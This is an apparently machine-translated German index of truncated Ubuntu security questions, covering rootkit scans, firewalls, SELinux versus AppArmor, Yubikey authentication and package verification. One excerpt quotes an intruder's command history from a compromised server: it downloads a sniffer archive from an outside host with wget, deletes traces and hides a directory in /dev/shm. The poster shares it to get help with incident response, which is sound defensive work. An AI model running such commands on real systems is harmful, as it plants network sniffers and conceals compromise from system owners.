Die Sicherheit umfasst eine breite Palette von Themen, darunter Benutzer, Berechtigungen, Authentifizierung, Autorisierung, Upgrades, Firewalling, Hardening usw.
Ich benutze Linux seit einiger Zeit und habe immer das Bedürfnis nach einer passiven Software / Skript-Einrichtung, die mich über verdächtige Netzwerkaktivitäten wie Scans, fehlgeschlagene Anmeldeversuche usw. im laufenden Betrieb per E-Mail oder per E-Mail benachrichtigen kann visuelle / akustische Benachrichtigungen. Ich weiß, wie man in Protokollen und so weiter …
Ich habe kürzlich einen Yubikey Neo gekauft - ein flottes kleines Gerät zur Authentifizierung mit zweitem Hardwarefaktor. Es ist in erster Linie für die Verwendung mit Einmalkennwörtern und dem aufkommenden U2F-Protokoll vorgesehen. Seit Yubikey Version 2 unterstützt es jedoch auch die HMAC-SHA1-Challenge-Response-Authentifizierung. HMAC-SHA1 kombiniert einen geheimen Schlüssel (der im Yubikey …
Meine Unternehmensrichtlinie besagt, dass Linux-Boxen mit SELinux gesichert werden müssen (damit ein Sicherheitsprüfer das Kontrollkästchen "Ja, wir sind extrem sicher!" Für jeden Server aktivieren kann). Ich hatte gehofft, Ubuntus großartige Standard-AppArmor-Sicherheit nutzen zu können. Ist es nicht ratsam, sowohl Apparmor als auch SELinux auszuführen? (Wenn ja, kann diese schlechte Idee …
Ich bin zu 99,9% sicher, dass mein System auf meinem PC infiltriert wurde. Gestatten Sie mir, zunächst meine Überlegungen anzustellen, damit die Situation klar wird: Grobe Zeitleiste verdächtiger Aktivitäten und nachfolgender Maßnahmen: 4-26 23:00 Ich beendete alle Programme und schloss meinen Laptop. 4-27 12:00 Ich habe meinen Laptop geöffnet, nachdem …
Scan by chkrootkit zeigt "tcpd" als INFIZIERT an. Obwohl ein Scan von rkhunter ok ist (außer bei normalen False Positives) Soll ich mir Sorgen machen? (Ich bin auf Ubuntu 16.10 mit 4.8.0-37-generic)
Ich weiß, dass das sudo-Passwort meinen Computer davor schützt, lokal von jemandem gehackt zu werden, der physischen Zugriff darauf hat ( Bearbeiten: Tatsächlich ist dies nicht der Fall ). Mein Passwort ist für diesen Zweck stark genug, aber ich weiß, dass es nicht stark genug ist, wenn jemand es aus …
Wie 99% der Benutzer installiere ich Ubuntu von vorgefertigten Binärdateien. Wie kann ich mich verifizieren, dass diese Binärdateien tatsächlich aus dem ursprünglichen Quellcode von Ubuntu stammen? Es wäre gut zu überprüfen, ob NSA / Jemand nicht mit Ubuntu oder Linode (meinem VPS-Provider) zusammengearbeitet hat, um mit den Binärdateien herumzuspielen. Wenn …
Kommt Ubuntu mit einer vorinstallierten oder automatischen Firewall? Wenn nicht, brauche ich einen? Ich habe einige Artikel über die Vorteile von Linux im Vergleich zu anderen Betriebssystemen in Bezug auf die Sicherheit gelesen (keine Notwendigkeit für Virenschutz, ...), möchte aber sicher gehen.
Ich verwende Ubuntu 10.04.1 LTS. Ich lasse rkhunter laufen , um nach Rootkits zu suchen . rkhunter beschwert sich über folgende versteckte Dateien und Verzeichnisse. Ich denke, diese Dateien sind kein echtes Problem auf meinem System, aber wie kann ich überprüfen, ob es sich bei diesen Dateien um legitime Dateien …
Gestern habe ich meinen Befehlsverlauf auf meinem VServer überprüft. Ich habe mehrere verdächtige Zeilen gefunden. 195 wget aridan.hol.es/sniffer.tgz 196 tar xvf sniffer.tgz 197 ls -a 198 rm -rf sniffer.tgz 199 rm -rf .sniff/ 200 cd /dev/shm 201 ls -a 202 mkdir " . " 203 ls -a 204 cd " …
Ich versuche, den do-release-upgradeProzess zu verstehen , dh die Art und Weise, wie Ubuntu mich auffordert, auf die nächste Ubuntu-Veröffentlichung im Frühjahr oder Herbst zu aktualisieren. Nachdem ich die Quellen für gelesen hatte, ubuntu-release-upgraderfand ich die Datei / etc / update-manager / meta-release auf meinem System. Diese Datei wird angezeigt. …
Einige Fragen, die ich in der Antwort beantworten möchte: Woher weiß ich, ob Apparmor ausgeführt wird? Wie kann ich feststellen, ob es gut funktioniert?
Ich verstehe, dass Malware, wenn sie in ein Linux-System eindringt, allenfalls ein Benutzerrecht erhält und alles ruiniert, was sich in der Reichweite des jeweiligen Benutzers befindet, dh die eigenen Dateien des Benutzers. Aber was genau hindert die Malware daran, auf Root-Ebene zuzugreifen? Kann es nicht irgendwie das Passwort von innen …
Auf einem RedHat / CentOS-System kann ich die auf meinem System installierten RPMs mit rpm -V überprüfen . Was ist das Ubuntu oder aptÄquivalent zu diesem Befehl?
We use cookies and other tracking technologies to improve your browsing experience on our website,
to show you personalized content and targeted ads, to analyze our website traffic,
and to understand where our visitors are coming from.
By continuing, you consent to our use of cookies and other tracking technologies and
affirm you're at least 16 years old or have consent from a parent or guardian.